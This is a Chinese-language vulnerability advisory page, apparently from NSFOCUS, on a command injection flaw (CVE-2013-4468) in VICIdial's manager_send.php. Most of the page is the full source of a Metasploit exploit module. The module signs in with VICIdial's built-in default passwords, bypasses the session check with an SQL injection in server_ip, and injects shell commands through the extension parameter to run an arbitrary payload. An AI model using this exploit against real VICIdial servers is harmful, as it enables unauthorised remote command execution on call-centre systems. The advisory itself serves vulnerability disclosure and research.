首页 -> 安全研究

安全研究

安全漏洞
VICIDIAL 'manager_send.php'命令注入漏洞(CVE-2013-4468)

发布日期:2013-10-23
更新日期:2013-10-23

受影响系统:
VICIdial VICIdial 2.8-403a
VICIdial VICIdial 2.7RC1
VICIdial VICIdial 2.7
描述:
BUGTRAQ  ID: 63288
CVE(CAN) ID: CVE-2013-4468

VICIDIAL是开源的呼叫中心解决方案。

VICIDIAL dialer (即Asterisk GUI客户端) 2.8-403a, 2.7, 2.7RC1及更早版本在实现上存在安全漏洞,远程用户通过manager_send.php的OriginateVDRelogin中,extension参数的shell元字符,利用此漏洞可执行任意命令。

<*来源:Adam Caudill
  
  链接:http://seclists.org/oss-sec/2013/q4/175
        http://www.exploit-db.com/exploits/29513/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'VICIdial Manager Send OS Command Injection',
      'Description' => %q{
          The file agc/manager_send.php in the VICIdial web application uses
        unsanitized user input as part of a command that is executed using the PHP
        passthru() function. A valid username, password and session are needed to access
        the injection point. Fortunately, VICIdial has two built-in accounts with default
        passwords and the manager_send.php file has a SQL injection vulnerability that can
        be used to bypass the session check as long as at least one session has been
        created at some point in time. In case there isn't any valid session, the user can
        provide astGUIcient credentials in order to create one. The results of the injected
        command are returned as part of the response from the web server. Affected versions
        include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The
        default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit.
      },
      'Author'      =>
        [
          'Adam Caudill <adam@adamcaudill.com>', # Vulnerability discovery
          'AverageSecurityGuy <stephen@averagesecurityguy.info>', # Metasploit Module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2013-4467' ],
          [ 'CVE', '2013-4468' ],
          [ 'OSVDB', '98903' ],
          [ 'OSVDB', '98902' ],
          [ 'BID', '63340' ],
          [ 'BID', '63288' ],
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2013/10/23/10' ],
          [ 'URL', 'http://adamcaudill.com/2013/10/23/vicidial-multiple-vulnerabilities/' ]
        ],
      'DisclosureDate' => 'Oct 23 2013',
      'Privileged'     => true,
      'Platform'       => ['unix'],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 8000, # Apache's limit for GET, it should be enough one to fit any payload
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              # Based on vicibox availability of binaries
              'RequiredCmd' => 'generic perl python awk bash telnet nc openssl',
            }
        },
      'Targets'        =>
        [
          [ 'CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ]
        ],
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('USERNAME',              [true, 'VICIdial Username', 'VDCL']),
        OptString.new('PASSWORD',              [true, 'VICIdial Password', 'donotedit']),
        OptString.new('USER_ASTGUI',           [false, 'astGUIcient User Login', '6666']),
        OptString.new('PASS_ASTGUI',           [false, 'astGUIcient User Password', '1234']),
        OptString.new('PHONE_USER_ASTGUI',     [false, 'astGUIcient Phone Login', '6666']),
        OptString.new('PHONE_PASSWORD_ASTGUI', [false, 'astGUIcient Phone Password', '1234'])
      ], self.class)
  end

  # Login through astGUIclient and create a web_client_sessions if there isn't
  # something available
  def login
    begin
      res = send_request_cgi({
        'uri'       => '/agc/astguiclient.php',
        'method'    => 'POST',
        'vars_post' => {
         "user"        => datastore["USER_ASTGUI"],
         "pass"        => datastore["PASS_ASTGUI"],
         "phone_login" => datastore["PHONE_USER_ASTGUI"],
         "phone_pass"  => datastore["PHONE_PASSWORD_ASTGUI"]
        }
      })
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end

    return res
  end

  def astguiclient_creds?
    if datastore["USER_ASTGUI"].nil? or datastore["USER_ASTGUI"].empty?
      return false
    end

    if datastore["PASS_ASTGUI"].nil? or datastore["PASS_ASTGUI"].empty?
      return false
    end

    if datastore["PHONE_USER_ASTGUI"].nil? or datastore["PHONE_USER_ASTGUI"].empty?
      return false
    end

    if datastore["PHONE_PASSWORD_ASTGUI"].nil? or datastore["PHONE_PASSWORD_ASTGUI"].empty?
      return false
    end

    return true
  end

  def request(cmd, timeout = 20)
    begin
      res = send_request_cgi({
        'uri'      => '/agc/manager_send.php',
        'method'   => 'GET',
        'vars_get' => {
          "enable_sipsak_messages" => "1",
          "allow_sipsak_messages"  => "1",
          "protocol"               => "sip",
          "ACTION"                 => "OriginateVDRelogin",
          "session_name"           => rand_text_alpha(12), # Random session name
          "server_ip"              => "' OR '1' = '1", # SQL Injection to validate the session
          "extension"              => ";#{cmd};",
          "user"                   => datastore['USERNAME'],
          "pass"                   => datastore['PASSWORD']
        }
      }, timeout)
    rescue ::Rex::ConnectionError
      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
      return nil
    end

    return res
  end

  def check
    res = request('ls -a .')

    if res and res.code == 200
      if res.body =~ /Invalid Username\/Password/
        vprint_error("#{peer} - Invalid Username or Password.")
        return Exploit::CheckCode::Detected
      elsif res.body =~ /Invalid session_name/
        vprint_error("#{peer} - Web client session not found")
        return Exploit::CheckCode::Detected
      elsif res.body =~ /\.\n\.\.\n/m
        return Exploit::CheckCode::Vulnerable
      end
    end

    return Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Checking if injection is possible...")
    res = request('ls -a .')

    unless res and res.code == 200
      fail_with(Failure::Unknown - "#{peer} - Unknown response, check the target")
    end

    if res.body =~ /Invalid Username\/Password/
      fail_with(Failure::NoAccess - "#{peer} - Invalid VICIdial credentials, check USERNAME and PASSWORD")
    end

    if res.body =~ /Invalid session_name/
      fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds?
      print_error("#{peer} - Valid web client session not found, trying to create one...")
      res = login
      unless res and res.code == 200 and res.body =~ /you are logged/
        fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.")
      end
      res = request('ls -a .')
    end

    unless res and res.code == 200 and res.body =~ /\.\n\.\.\n/m
      fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible")
    end

    print_good("#{peer} - Exploitation looks feasible, proceeding... ")
    request("#{payload.encoded}", 1)
  end

end

建议:
厂商补丁:

VICIdial
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.vicidial.com/

浏览次数:2266
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客